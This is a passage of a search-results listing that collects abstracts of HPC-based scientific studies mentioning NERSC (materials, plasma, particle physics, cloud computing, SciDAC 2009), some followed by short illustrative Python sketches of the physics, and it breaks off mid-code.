  15. Are Cloud Environments Ready for Scientific Applications?

    NASA Astrophysics Data System (ADS)

    Mehrotra, P.; Shackleford, K.

    2011-12-01

    Cloud computing environments are becoming widely available in both the commercial and government sectors. They provide the flexibility to rapidly provision resources to meet dynamic and changing computational needs, without the customers incurring capital expenses and/or requiring technical expertise. Clouds also provide reliable access to resources even when the end-user lacks in-house expertise for acquiring or operating such resources. Consolidation and pooling in a cloud environment allow organizations to achieve economies of scale in provisioning or procuring computing resources and services. Because of these and other benefits, many businesses and organizations are migrating their business applications (e.g., websites, social media, and business processes) to cloud environments, as evidenced by the commercial success of offerings such as Amazon EC2. In this paper, we focus on the feasibility of utilizing cloud environments for scientific workloads and workflows of particular interest to NASA scientists and engineers. There is a wide spectrum of such technical computations. These applications range from small workstation-level computations, to mid-range computing requiring small clusters, to high-performance simulations requiring supercomputing systems with high-bandwidth/low-latency interconnects. Data-centric applications manage and manipulate large data sets such as satellite observational data and/or data previously produced by high-fidelity modeling and simulation computations. Most of the applications run in batch mode with static resource requirements. However, there do exist situations with dynamic demands, particularly ones with public-facing interfaces providing information to the general public, collaborators and partners, as well as to internal NASA users. In the last few months we have been studying the suitability of cloud environments for NASA's technical and scientific workloads. 
We have ported several applications to multiple cloud environments including NASA's Nebula environment, Amazon's EC2, Magellan at NERSC, and SGI's Cyclone system. We critically examined the performance of the applications on these systems. We also collected information on the usability of these cloud environments. In this talk we will present the results of our study focusing on the efficacy of using clouds for NASA's scientific applications.

  16. Anharmonicity and confinement in zeolites: Structure, spectroscopy, and adsorption free energy of ethanol in H-ZSM-5

    DOE PAGES

    Alexopoulos, Konstantinos; Lee, Mal-Soon; Liu, Yue; ...

    2016-03-21

    Here, to account for thermal and entropic effects arising from the dynamical motion of the reaction intermediates, ethanol adsorption on the Brønsted acid site of the H-ZSM-5 catalyst has been studied at different temperatures and ethanol loadings using ab initio molecular dynamics (AIMD) simulations, infrared (IR) spectroscopy and calorimetric measurements. At low temperatures (T ≤ 400 K) and low ethanol loading, a single ethanol molecule adsorbed in H-ZSM-5 forms a Zundel-like structure in which the proton is equally shared between the oxygen of the zeolite and the oxygen of the alcohol. At higher ethanol loading, a second ethanol molecule helps to stabilize the protonated ethanol at all temperatures by acting as a solvating agent. The vibrational density of states (VDOS), as calculated from the AIMD simulations, is in excellent agreement with measured IR spectra for the C2H5OH, C2H5OD and C2D5OH isotopomers and supports the existence of both monomers and dimers. A quasi-harmonic approximation (QHA), applied to the VDOS obtained from the AIMD simulations, provides estimates of the adsorption free energy within ~10 kJ/mol of the experimentally determined quantities, whereas the traditional approach, employing harmonic frequencies from a single ground-state minimum, strongly overestimates the adsorption free energy by at least ~30 kJ/mol. This discrepancy is traced back to the inability of the harmonic approximation to represent the contributions of the vibrational motions of the ethanol molecule upon confinement in the zeolite. KA, MFR, GBM were supported by the Long Term Structural Methusalem Funding by the Flemish Government - grant number BOF09/01M00409. MSL, VAG, RR and JAL were supported by the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. PNNL is a multiprogram national laboratory operated for DOE by Battelle. Computational resources were provided at the W. R. Wiley Environmental Molecular Science Laboratory (EMSL), a national scientific user facility sponsored by the Department of Energy's Office of Biological and Environmental Research located at PNNL, the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory and the Stevin Supercomputer Infrastructure at Ghent University.
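    Both the QHA and the traditional single-minimum approach ultimately evaluate the harmonic vibrational free energy, F = Σᵢ [hνᵢ/2 + k_BT ln(1 − e^(−hνᵢ/k_BT))]; they differ in where the frequencies come from (AIMD-derived VDOS versus ground-state normal modes). A sketch of that per-mode sum, using illustrative wavenumbers that are not taken from the paper:

    ```python
    import math

    H = 6.62607015e-34      # Planck constant, J*s
    KB = 1.380649e-23       # Boltzmann constant, J/K
    C_CM = 2.99792458e10    # speed of light, cm/s
    NA = 6.02214076e23      # Avogadro's number, 1/mol

    def vib_free_energy_kj_mol(freqs_cm, T):
        """Harmonic vibrational free energy in kJ/mol:
        F = sum_i [ h*nu_i/2 + kB*T*ln(1 - exp(-h*nu_i/(kB*T))) ]."""
        f = 0.0
        for nu in freqs_cm:
            e = H * C_CM * nu   # mode quantum h*nu in J (nu given in cm^-1)
            f += 0.5 * e + KB * T * math.log(1.0 - math.exp(-e / (KB * T)))
        return f * NA / 1000.0

    # Illustrative low-frequency adsorbate modes in cm^-1 (hypothetical values)
    modes = [100.0, 250.0, 400.0]
    dF = vib_free_energy_kj_mol(modes, 400.0) - vib_free_energy_kj_mol(modes, 300.0)
    # dF < 0: free energy decreases with temperature as vibrational entropy grows
    ```

    Soft, anharmonic modes of a confined molecule shift the effective νᵢ downward relative to the single-minimum harmonic values, which is how the two approaches end up tens of kJ/mol apart.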

  17. Diffusion of lithium ions in amorphous and crystalline PEO3:LiCF3SO3 polymer electrolytes: ab initio calculations and simulations

    NASA Astrophysics Data System (ADS)

    Xue, Sha; Liu, Yingdi; Li, Yaping; Teeters, Dale; Crunkleton, Daniel; Wang, Sanwu

    The PEO3:LiCF3SO3 polymer electrolyte has attracted significant research interest due to its high conductivity and enhanced stability in lithium polymer batteries. Most experimental studies have shown that amorphous PEO lithium salt electrolytes have higher conductivity than crystalline ones; other studies, however, have shown that the crystalline phase can also conduct ions. In this work, we use ab initio molecular dynamics simulations to obtain the amorphous structure of PEO3:LiCF3SO3. The diffusion pathways and activation energies of lithium ions in both crystalline and amorphous PEO3:LiCF3SO3 are determined with first-principles density functional theory. In crystalline PEO3:LiCF3SO3, the activation energy for the low-barrier diffusion pathway is approximately 1.0 eV; in the amorphous phase, the value is 0.6 eV. This result supports the experimental observation that amorphous PEO3:LiCF3SO3 has higher ionic conductivity than the crystalline phase. This work was supported by NASA Grant No. NNX13AN01A and by the Tulsa Institute of Alternative Energy and the Tulsa Institute of Nanotechnology. This research used resources of XSEDE, NERSC, and the Tandy Supercomputing Center.
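    Assuming thermally activated (Arrhenius) diffusion, D ∝ exp(−Ea/k_BT), with equal prefactors — an idealization, since real prefactors differ between phases — the reported 0.6 eV versus 1.0 eV barriers imply a diffusivity ratio of millions at room temperature, a quick way to see why the amorphous phase should conduct far better:

    ```python
    import math

    KB_EV = 8.617333262e-5  # Boltzmann constant, eV/K

    def arrhenius_ratio(ea_low_ev, ea_high_ev, temp_k):
        """D_low / D_high for thermally activated diffusion D ~ exp(-Ea/(kB*T)),
        assuming equal prefactors (an idealization, not the paper's claim)."""
        return math.exp((ea_high_ev - ea_low_ev) / (KB_EV * temp_k))

    # Barriers from the abstract: amorphous 0.6 eV vs crystalline 1.0 eV
    ratio = arrhenius_ratio(0.6, 1.0, 300.0)
    # roughly 5e6: amorphous diffusion is millions of times faster at 300 K
    ```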

  18. Thread-Level Parallelization and Optimization of NWChem for the Intel MIC Architecture

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shan, Hongzhang; Williams, Samuel; de Jong, Wibe

    In the multicore era it was possible to exploit the increase in on-chip parallelism by simply running multiple MPI processes per chip. Unfortunately, manycore processors' greatly increased thread- and data-level parallelism, coupled with reduced memory capacity, demand an altogether different approach. In this paper we explore augmenting two NWChem modules, the triples correction of CCSD(T) and Fock matrix construction, with OpenMP so that they might run efficiently on future manycore architectures. As the next NERSC machine will be a self-hosted Intel MIC (Xeon Phi) based supercomputer, we leverage an existing MIC testbed at NERSC to evaluate our experiments. To proxy the fact that future MIC machines will not have a host processor, we run all of our experiments in native mode. We found that while straightforward application of OpenMP to the deep loop nests associated with the tensor contractions of CCSD(T) was sufficient to attain high performance, significant effort was required to safely and efficiently thread the TEXAS integral package when constructing the Fock matrix. Ultimately, our new MPI+OpenMP hybrid implementations attain up to 65× better performance for the triples part of CCSD(T), due in large part to the fact that limited on-card memory restricts the existing MPI implementation to a single process per card. Additionally, we obtain up to 1.6× better performance on Fock matrix construction when compared with the best MPI implementations running multiple processes per card.

  19. Thread-level parallelization and optimization of NWChem for the Intel MIC architecture

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shan, Hongzhang; Williams, Samuel; de Jong, Wibe

    In the multicore era it was possible to exploit the increase in on-chip parallelism by simply running multiple MPI processes per chip. Unfortunately, manycore processors' greatly increased thread- and data-level parallelism, coupled with reduced memory capacity, demand an altogether different approach. In this paper we explore augmenting two NWChem modules, the triples correction of CCSD(T) and Fock matrix construction, with OpenMP so that they might run efficiently on future manycore architectures. As the next NERSC machine will be a self-hosted Intel MIC (Xeon Phi) based supercomputer, we leverage an existing MIC testbed at NERSC to evaluate our experiments. To proxy the fact that future MIC machines will not have a host processor, we run all of our experiments in native mode. We found that while straightforward application of OpenMP to the deep loop nests associated with the tensor contractions of CCSD(T) was sufficient to attain high performance, significant effort was required to safely and efficiently thread the TEXAS integral package when constructing the Fock matrix. Ultimately, our new MPI+OpenMP hybrid implementations attain up to 65× better performance for the triples part of CCSD(T), due in large part to the fact that limited on-card memory restricts the existing MPI implementation to a single process per card. Additionally, we obtain up to 1.6× better performance on Fock matrix construction when compared with the best MPI implementations running multiple processes per card.

  20. Highly Efficient Parallel Multigrid Solver For Large-Scale Simulation of Grain Growth Using the Structural Phase Field Crystal Model

    NASA Astrophysics Data System (ADS)

    Guan, Zhen; Pekurovsky, Dmitry; Luce, Jason; Thornton, Katsuyo; Lowengrub, John

    The structural phase field crystal (XPFC) model can be used to model grain growth in polycrystalline materials at diffusive time scales while maintaining atomic-scale resolution. However, the governing equation of the XPFC model is an integro-partial differential equation (IPDE), which poses challenges for implementation on high performance computing (HPC) platforms. In collaboration with the XSEDE Extended Collaborative Support Service, we developed a distributed-memory HPC solver for the XPFC model, which combines parallel multigrid with P3DFFT. Performance benchmarking on the Stampede supercomputer indicates near-linear strong and weak scaling, for both the multigrid solver and the transfer time between the multigrid and FFT modules, up to 1024 cores. Scalability of the FFT module begins to decline at 128 cores, but it is sufficient for the type of problem we will be examining. We have demonstrated simulations using 1024 cores, and we expect to reach 4096 cores and beyond. Ongoing work involves optimization of the MPI/OpenMP-based code for the Intel KNL many-core architecture. This targets coming pre-exascale systems, in particular many-core systems such as Stampede 2.0 and Cori 2 at NERSC, without sacrificing efficiency on other general HPC systems.
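    The multigrid half of such a solver follows the standard smooth-restrict-correct-prolong cycle. A minimal serial sketch of one V-cycle for the 1D Poisson problem — a stand-in model problem, not the XPFC equations:

    ```python
    def jacobi(u, f, n, h2, w=2.0 / 3.0):
        """One weighted-Jacobi sweep for -u'' = f (boundary values held fixed)."""
        new = u[:]
        for i in range(1, n):
            new[i] = (1.0 - w) * u[i] + w * 0.5 * (u[i - 1] + u[i + 1] + h2 * f[i])
        return new

    def vcycle(u, f, n, nu=3):
        """One multigrid V-cycle for -u'' = f on [0,1] with u(0)=u(1)=0,
        discretized on n intervals (n a power of two); u, f have length n+1."""
        h2 = (1.0 / n) ** 2
        if n == 2:                              # one interior unknown: exact solve
            u[1] = 0.5 * h2 * f[1]
            return u
        for _ in range(nu):                     # pre-smoothing
            u = jacobi(u, f, n, h2)
        r = [0.0] * (n + 1)                     # fine-grid residual r = f - A u
        for i in range(1, n):
            r[i] = f[i] - (2.0 * u[i] - u[i - 1] - u[i + 1]) / h2
        rc = [0.0] * (n // 2 + 1)               # full-weighting restriction
        for i in range(1, n // 2):
            rc[i] = 0.25 * r[2 * i - 1] + 0.5 * r[2 * i] + 0.25 * r[2 * i + 1]
        ec = vcycle([0.0] * (n // 2 + 1), rc, n // 2, nu)  # coarse correction
        for i in range(1, n // 2):              # linear-interpolation prolongation
            u[2 * i] += ec[i]
        for i in range(n // 2):
            u[2 * i + 1] += 0.5 * (ec[i] + ec[i + 1])
        for _ in range(nu):                     # post-smoothing
            u = jacobi(u, f, n, h2)
        return u

    n = 32
    u = [0.0] * (n + 1)
    f = [1.0] * (n + 1)
    for _ in range(15):
        u = vcycle(u, f, n)
    # for f = 1 the nodal solution converges to u(x) = x(1-x)/2
    ```

    In the distributed solver, each smoothing sweep and grid transfer becomes a halo-exchange operation, and the cycle is coupled to FFT-based (P3DFFT) evaluation of the model's nonlocal terms.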

  1. Simulations of laser-driven ion acceleration from a thin CH target

    NASA Astrophysics Data System (ADS)

    Park, Jaehong; Bulanov, Stepan; Ji, Qing; Steinke, Sven; Treffert, Franziska; Vay, Jean-Luc; Schenkel, Thomas; Esarey, Eric; Leemans, Wim; Vincenti, Henri

    2017-10-01

    2D and 3D computer simulations of laser-driven ion acceleration from a thin CH foil were performed using the code WARP. As the foil thickness varies from a few nm to μm, the simulations confirm that the acceleration mechanism transitions from radiation pressure acceleration (RPA) to target normal sheath acceleration (TNSA). In the TNSA regime, with a CH target thickness of 1 μm and a pre-plasma ahead of the target, the simulations show the production of a collimated proton beam with a maximum energy of about 10 MeV. This agrees with the experimental results obtained at the BELLA laser facility (I ≈ 5 × 10^18 W/cm2, λ = 800 nm). Furthermore, the dependence of the maximum proton energy on the initialization setup, i.e., different angles of laser incidence from the target normal axis and different gradient scales and distributions of the pre-plasma, was explored. This work was supported by LDRD funding from LBNL, provided by the U.S. DOE under Contract No. DE-AC02-05CH11231, and used resources of NERSC, a DOE Office of Science User Facility supported by the U.S. DOE under Contract No. DE-AC02-05CH11231.

  2. Spark and HPC for High Energy Physics Data Analyses

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Sehrish, Saba; Kowalkowski, Jim; Paterno, Marc

    A full High Energy Physics (HEP) data analysis is divided into multiple data reduction phases. Processing within these phases is extremely time-consuming, so intermediate results are stored in files held in mass storage systems and referenced as parts of large datasets. This processing model limits what can be done with interactive data analytics. Growth in the size and complexity of experimental datasets, along with emerging big data tools, is beginning to change the traditional ways of doing data analyses. Use of big data tools for HEP analysis looks promising, mainly because extremely large HEP datasets can be represented and held in memory across a system and accessed interactively by encoding an analysis using high-level programming abstractions. The mainstream tools, however, are not designed for scientific computing or for exploiting the available HPC platform features. We use an example from the Compact Muon Solenoid (CMS) experiment at the Large Hadron Collider (LHC) in Geneva, Switzerland, the highest-energy particle collider in the world. Our use case focuses on searching for new types of elementary particles that could explain dark matter in the universe. We use HDF5 as our input data format and Spark to implement the use case. We show the benefits and limitations of using Spark with HDF5 on Edison at NERSC.

  3. Understanding the spin-driven polarizations in BiMO3 (M = 3d transition metals) multiferroics

    NASA Astrophysics Data System (ADS)

    Kc, Santosh; Lee, Jun Hee; Cooper, Valentino R.

    Bismuth ferrite (BiFeO3), a promising multiferroic, stabilizes in a perovskite-type rhombohedral crystal structure (space group R3c) at room temperature. Recently, it has been reported that in its ground state it possesses a huge spin-driven polarization. To probe the underlying mechanism of this large spin-phonon response, we examine these couplings within other Bi-based 3d transition metal oxides BiMO3 (M = Ti, V, Cr, Mn, Fe, Co, Ni) using density functional theory. Our results demonstrate that this large spin-driven polarization is a consequence of symmetry breaking due to competition between ferroelectric distortions and anti-ferrodistortive octahedral rotations. Furthermore, we find a strong dependence of these enhanced spin-driven polarizations on the crystal structure, with the rhombohedral phase having the largest spin-induced atomic distortions along [111]. These results give significant insights into the magneto-electric coupling in these materials, which is essential to the magnetic- and electric-field control of electric polarization and magnetization in multiferroic-based devices. Research is supported by the US Department of Energy, Office of Science, Basic Energy Sciences, Materials Science and Engineering Division and the Office of Science Early Career Research Program (V.R.C.) and used computational resources at NERSC.

  4. Suppressing Electron Turbulence and Triggering Internal Transport Barriers with Reversed Magnetic Shear in the National Spherical Torus Experiment

    NASA Astrophysics Data System (ADS)

    Peterson, Jayson Luc

    2011-10-01

    Observations in the National Spherical Torus Experiment (NSTX) have found electron temperature gradients that greatly exceed the linear threshold for the onset of electron temperature gradient-driven (ETG) turbulence. These discharges, deemed electron internal transport barriers (e-ITBs), coincide with a reversal in the shear of the magnetic field and with a reduction in electron-scale density fluctuations, qualitatively consistent with earlier gyrokinetic predictions. To investigate this phenomenon further, we numerically model electron turbulence in NSTX reversed-shear plasmas using the gyrokinetic turbulence code GYRO. These first-of-their-kind nonlinear gyrokinetic simulations of NSTX e-ITBs confirm that reversing the magnetic shear can allow the plasma to reach electron temperature gradients well beyond the critical gradient for the linear onset of instability. This effect is very strong, with the nonlinear threshold for significant transport approaching three times the linear critical gradient in some cases, in contrast with moderate-shear cases, which can drive significant ETG turbulence at much lower gradients. In addition to the experimental implications of this upshifted nonlinear critical gradient, we explore the behavior of ETG turbulence during reversed-shear discharges. This work is supported by the SciDAC Center for the Study of Plasma Microturbulence, DOE Contract DE-AC02-09CH11466, and used the resources of NCCS at ORNL and NERSC at LBNL. M. Ono et al., Nucl. Fusion 40, 557 (2000).

  5. Using OFI libfabric on Cori/Edison

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pritchard, Howard Porter; Choi, Sung-Eun

    2016-08-22

    These are slides from a presentation during a NERSC site visit to Los Alamos National Laboratory. The following topics are covered: building/installing libfabric, Open MPI using libfabric, MPICH using libfabric, OpenSHMEM (Sandia), other applications, and what is next. The next steps are: release libfabric 1.4; install libfabric 1.4 in system space on Cori; add libfabric modules on Cori; provide a SLURM PMI module to simplify building and using Open MPI and MPICH with libfabric; and upgrade Edison to CLE 5.2 UP04 or newer.

  6. Preface: SciDAC 2009

    NASA Astrophysics Data System (ADS)

    Simon, Horst

    2009-07-01

    By almost any measure, the SciDAC community has come a long way since DOE launched the SciDAC program back in 2001. At the time, we were grappling with how to efficiently run applications on terascale systems (the November 2001 TOP500 list was led by DOE's ASCI White IBM system at Lawrence Livermore achieving 7.2 teraflop/s). And the results stemming from the first round of SciDAC projects were summed up in two-page reports. The scientific results were presented at annual meetings, which were by invitation only and typically were attended by about 75 researchers. Fast forward to 2009 and we now have SciDAC Review, a quarterly magazine showcasing the scientific computing contributions of SciDAC projects and related programs, all focused on presenting a comprehensive look at Scientific Discovery through Advanced Computing. That is also the motivation behind the annual SciDAC conference that in 2009 was held from June 14-18 in San Diego. The annual conference, which can also be described as a celebration of all things SciDAC, grew out of those meetings organized in the early days of the program. In 2005, the meeting was held in San Francisco and attendance was opened up to all members of the SciDAC community. The schedule was also expanded to include a keynote address, plenary speakers and other features found in a conference format. This year marks the fifth such SciDAC conference, which now comprises four days of computational science presentations, multiple poster sessions and, since last year, an evening event showcasing simulations and modeling runs resulting from SciDAC projects. The fifth annual SciDAC conference was remarkable on several levels. The primary purpose, of course, is to showcase the research accomplishments resulting from SciDAC programs in particular and computational science in general. It is these accomplishments, represented in 38 papers and 52 posters, that comprise this set of conference proceedings.
These proceedings can stand alone as evidence of the success of DOE's innovative SciDAC efforts. But from the outset, a critical driver for the program was to foster increased collaboration among researchers across disciplines and organizations. In particular, SciDAC wanted to engage scientists at universities in the projects, both to expand the community and to develop the next generation of computational scientists. At the meeting in San Diego, the fruits of this emphasis were clearly visible, from the special poster session highlighting the work of the DOE Computational Science Graduate Fellows, to the informal discussions in hotel hallways, to focused side meetings apart from the main presentations. A highlight of the meeting was the keynote address by Dr Ray Orbach, until recently the DOE Under Secretary for Science and head of the Office of Science. It was during his tenure that the first round of projects matured and the second set of SciDAC projects were launched. And complementing these research projects was Dr Orbach's vision for INCITE, DOE's Innovative and Novel Computational Impact on Theory and Experiment program, inaugurated in 2003. This program allocated significant HPC resources to scientists tackling high-impact problems, including some of those addressed by SciDAC teams. Together, SciDAC and INCITE are dramatically accelerating the field of computational science. As has been noted before, the SciDAC conference celebrates progress in advancing science through large-scale modeling and simulation. Over 400 people registered to attend this year's talks, poster sessions and tutorials, all spanning the disciplines supported by DOE. While the principal focus was on SciDAC accomplishments, this year's conference also included invited presentations and posters from colleagues whose research is supported by other agencies. 
At the 2009 meeting we also formalized a developing synergy with the Department of Defense's HPC Users Group Meeting, which has occasionally met in parallel with the SciDAC meeting. But in San Diego, we took the additional steps of organizing a joint poster session and a joint plenary session, further advancing opportunities for broader networking. Throughout the four-day program, attendees at both meetings had the option of sitting in on sessions at either conference. We also included several of the NSF Petascale applications in the program, and extended invitations to our computational colleagues in other federal agencies, including the National Science Foundation, NASA, and the National Oceanic and Atmospheric Administration, as well as to international collaborators, to join us in San Diego. In 2009 we also reprised one of the more popular sessions from Seattle in 2008, the Electronic Visualization and Poster Night, during which 29 scientific visualizations were presented on high-resolution large-format displays. The best entries were awarded one of the coveted 'OASCR Awards.' The conference also featured a session about breakthroughs in computational science, based on the 'Breakthrough Report' that was published in 2008, led by Tony Mezzacappa (ORNL). Tony was also the chair of the SciDAC 2005 conference. For the third consecutive year, the conference was followed by a day of tutorials organized by the SciDAC Outreach Center and aimed primarily at students interested in scientific computing. This year, nearly 100 participants attended the tutorials, hosted by the San Diego Supercomputer Center and General Atomics. This outreach to the broader community is really what SciDAC is all about - Scientific Discovery through Advanced Computing.
Such discoveries are not confined by organizational lines, but rather are often the result of researchers reaching out and collaborating with others, using their combined expertise to push our boundaries of knowledge. I am happy to see that this vision is shared by so many researchers in computational science, who all decided to join SciDAC 2009. While credit for the excellent presentations and posters goes to the teams of researchers, the success of this year's conference is due to the strong efforts and support from members of the 2009 SciDAC Program Committee and Organizing Committee, and I would like to extend my heartfelt thanks to them for helping to make the 2009 meeting the largest and most successful to date. Program Committee members were: David Bader, LLNL; Pete Beckman, ANL; John Bell, LBNL; John Boisseau, University of Texas; Paul Bonoli, MIT; Hank Childs, LBNL; Bill Collins, LBNL; Jim Davenport, BNL; David Dean, ORNL; Thom Dunning, NCSA; Peg Folta, LLNL; Glenn Hammond, PNNL; Maciej Haranczyk, LBNL; Robert Harrison, ORNL; Paul Hovland, ANL; Paul Kent, ORNL; Aram Kevorkian, SPAWAR; David Keyes, Columbia University; Kwok Ko, SLAC; Felice Lightstone, LLNL; Bob Lucas, ISI/USC; Paul Mackenzie, Fermilab; Tony Mezzacappa, ORNL; John Negele, MIT; Jeff Nichols, ORNL; Mike Norman, UCSD; Joe Oefelein, SNL; Jeanie Osburn, NRL; Peter Ostroumov, ANL; Valerio Pascucci, University of Utah; Ruth Pordes, Fermilab; Rob Ross, ANL; Nagiza Samatova, ORNL; Martin Savage, University of Washington; Tim Scheibe, PNNL; Ed Seidel, NSF; Arie Shoshani, LBNL; Rick Stevens, ANL; Bob Sugar, UCSB; Bill Tang, PPPL; Bob Wilhelmson, NCSA; Kathy Yelick, NERSC/LBNL; Dave Zachmann, Vista Computational Technology LLC. Organizing Committee members were: Communications: Jon Bashor, LBNL. Contracts/Logistics: Mary Spada and Cheryl Zidel, ANL. Posters: David Bailey, LBNL. Proceedings: John Hules, LBNL. Proceedings Database Developer: Beth Cerny Patino, ANL. 
Program Committee Liaison/Conference Web Site: Yeen Mankin, LBNL. Tutorials: David Skinner, NERSC/LBNL. Visualization Night: Hank Childs, LBNL; Valerio Pascucci, Chems Touati, Nathan Galli, and Erik Jorgensen, University of Utah. Again, my thanks to all. Horst Simon San Diego, California June 18, 2009

  7. Radiative and Auger recombination of degenerate carriers in InN

    NASA Astrophysics Data System (ADS)

    McAllister, Andrew; Bayerl, Dylan; Kioupakis, Emmanouil

    Group-III nitrides find applications in many fields - energy conversion, sensors, and solid-state lighting. The band gaps of InN, GaN and AlN alloys span the infrared to ultraviolet spectral range. However, nitride optoelectronic devices suffer from a drop in efficiency as carrier density increases. A major component of this decrease is Auger recombination, but its influence is not fully understood, particularly for degenerate carriers. For nondegenerate carriers the radiative rate scales as the carrier density squared, while the Auger rate scales as the density cubed. However, it is unclear how these power laws change as carriers become degenerate. Using first-principles calculations we studied the dependence of the radiative and Auger recombination rates on carrier density in InN. We found a more complex density dependence of the Auger rate than expected. The power law of the Auger rate changes at different densities depending on the type of Auger process involved and the type of carriers that have become degenerate. In contrast, the power law of the radiative rate changes when either carrier type becomes degenerate. This creates problems in designing devices, as Auger remains a major contributor to carrier recombination at densities for which radiative recombination is suppressed by phase-space filling. This work was supported by NSF (GRFP DGE 1256260 and CAREER DMR-1254314). Computational resources provided by the DOE NERSC facility (DE-AC02-05CH11231).
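
    The density scalings quoted above can be illustrated with the standard ABC recombination model, in which (in the nondegenerate limit) Shockley-Read-Hall loss scales as n, radiative recombination as n squared, and Auger recombination as n cubed. A minimal sketch follows; the coefficient values are illustrative placeholders, not the first-principles InN values computed in this work:

```python
# Sketch of the ABC recombination model in the nondegenerate limit:
#   R_SRH = A*n,  R_rad = B*n**2,  R_Auger = C*n**3.
# The coefficients below are illustrative placeholders, not the
# first-principles InN values.
A = 1e7      # 1/s     Shockley-Read-Hall
B = 1e-10    # cm^3/s  radiative
C = 1e-30    # cm^6/s  Auger

def iqe(n):
    """Internal quantum efficiency at carrier density n (cm^-3)."""
    r_srh, r_rad, r_auger = A * n, B * n ** 2, C * n ** 3
    return r_rad / (r_srh + r_rad + r_auger)

densities = [1e17, 1e18, 1e19, 1e20]
effs = [iqe(n) for n in densities]
```

    Because the Auger term grows one power of n faster than the radiative term, its share of the total recombination rises with density, which is why the efficiency peaks and then droops at high carrier density.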

  8. Visualization Tools for Lattice QCD - Final Report

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Massimo Di Pierro

    2012-03-15

    Our research project is about the development of visualization tools for Lattice QCD. We developed various tools by extending existing libraries, adding new algorithms, exposing new APIs, and creating web interfaces (including the new NERSC gauge connection web site). Our tools cover the full stack of operations from automating download of data, to generating VTK files (topological charge, plaquette, Polyakov lines, quark and meson propagators, currents), to turning the VTK files into images, movies, and web pages. Some of the tools have their own web interfaces. Some Lattice QCD visualizations have been created in the past but, to our knowledge, our tools are the only ones of their kind, since they are general purpose, customizable, and relatively easy to use. We believe they will be valuable to physicists working in the field. They can be used to better teach Lattice QCD concepts to new graduate students; they can be used to observe the changes in topological charge density and detect possible sources of bias in computations; they can be used to observe the convergence of the algorithms at a local level and determine possible problems; they can be used to probe heavy-light mesons with currents and determine their spatial distribution; they can be used to detect corrupted gauge configurations. There are some indirect results of this grant that will benefit a broader audience than Lattice QCD physicists.

  9. High-Performance Computing Data Center | Energy Systems Integration

    Science.gov Websites

    Facility | NREL. The Energy Systems Integration Facility's High-Performance Computing Data Center is home to Peregrine, the largest high-performance computing system in the world exclusively dedicated to advancing renewable energy and energy efficiency technologies.

  10. Berkeley Lab - Materials Sciences Division

    Science.gov Websites

    The Materials Sciences Division's research centers include the Center for Computational Study of Excited-State Phenomena in Energy Materials and the Center for X-ray Optics, alongside MSD facilities for ion and materials physics, scattering, and instrumentation science.

  11. High-Performance Computing Data Center Warm-Water Liquid Cooling |

    Science.gov Websites

    Computational Science | NREL. NREL's High-Performance Computing Data Center (HPC Data Center) is cooled with warm liquid water. Liquid cooling technologies offer a more energy-efficient solution than conventional air cooling, one that also allows for effective capture and reuse of waste heat.

  12. Precision searches in dijets at the HL-LHC and HE-LHC

    NASA Astrophysics Data System (ADS)

    Chekanov, S. V.; Childers, J. T.; Proudfoot, J.; Wang, R.; Frizzell, D.

    2018-05-01

    This paper explores the physics reach of the High-Luminosity Large Hadron Collider (HL-LHC) for searches for new particles decaying to two jets. We discuss inclusive searches in dijets and b-jets, as well as searches in semi-inclusive events that require an additional lepton, which increases sensitivity to different aspects of the underlying processes. We discuss the expected exclusion limits for generic models predicting new massive particles that result in resonant structures in the dijet mass. Prospects for the High-Energy LHC (HE-LHC) collider are also discussed. The study is based on the Pythia8 Monte Carlo generator using representative event statistics for the HL-LHC and HE-LHC running conditions. The event samples were created using supercomputers at NERSC.

  13. The HIBEAM Manual

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fawley, William M.

    2000-02-01

    HIBEAM is a 2 1/2D particle-in-cell (PIC) simulation code developed in the late 1990s in the Heavy-Ion Fusion research program at Lawrence Berkeley National Laboratory. The major purpose of HIBEAM is to simulate the transverse (i.e., X-Y) dynamics of a space-charge-dominated, non-relativistic heavy-ion beam being transported in a static accelerator focusing lattice. HIBEAM has been used to study beam combining systems, effective dynamic apertures in electrostatic quadrupole lattices, and emittance growth due to transverse misalignments. At present, HIBEAM runs on the CRAY vector machines (C90 and J90s) at NERSC, although it would be relatively simple to port the code to UNIX workstations so long as IMSL math routines were available.

  14. Post-pyrite transition in SiO2

    NASA Astrophysics Data System (ADS)

    Ho, K.; Wu, S.; Umemoto, K.; Wentzcovitch, R. M.; Ji, M.; Wang, C.

    2010-12-01

    Here we propose a new phase of SiO2 beyond the pyrite-type phase. SiO2 is one of the most important minerals in Earth and planetary sciences. So far, the pyrite-type phase has been identified experimentally as the highest-pressure form of SiO2. In giant planets and extrasolar planets, whose interior pressures are considerably higher than those inside Earth, a post-pyrite transition in SiO2 may occur at ~ 1 TPa as a result of the dissociation of MgSiO3 post-perovskite into MgO and SiO2 [Umemoto et al., Science 311, 983 (2006)]. Several dioxides considered to be low-pressure analogs of SiO2 have a phase with cotunnite-type (PbCl2-type) structure as the post-pyrite phase. However, a first-principles structural search using a genetic algorithm shows that SiO2 should undergo a post-pyrite transition to a hexagonal phase, not to the cotunnite phase. The hexagonal phase is energetically very competitive with the cotunnite-type one. This work was supported by the U.S. Department of Energy, Office of Basic Energy Science, Division of Materials Sciences and Engineering and NSF under ATM-0428774 (VLab), EAR-0757903, and EAR-1019853. Ames Laboratory is operated for the U.S. Department of Energy by Iowa State University under Contract No. DE-AC02-07CH11358. The computations were performed at the National Energy Research Scientific Computing Center (NERSC) and the Minnesota Supercomputing Institute (MSI).
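
    The structural search described above relies on a genetic algorithm. A minimal sketch of the idea, evolving candidate "structures" (here reduced to a single coordinate) against a toy convex energy function rather than a real first-principles energy landscape, might look like:

```python
import random

random.seed(0)

def energy(x):
    # Toy convex "energy" standing in for a first-principles total
    # energy; its unique minimum is at x = 1.75.
    return (x - 2.0) ** 2 + 0.5 * abs(x)

def evolve(pop_size=40, generations=60):
    # Random initial "structures" (here: a single coordinate each).
    pop = [random.uniform(-10.0, 10.0) for _ in range(pop_size)]
    for _ in range(generations):
        pop.sort(key=energy)
        parents = pop[: pop_size // 2]          # selection (elitist)
        children = []
        while len(children) < pop_size - len(parents):
            a, b = random.sample(parents, 2)
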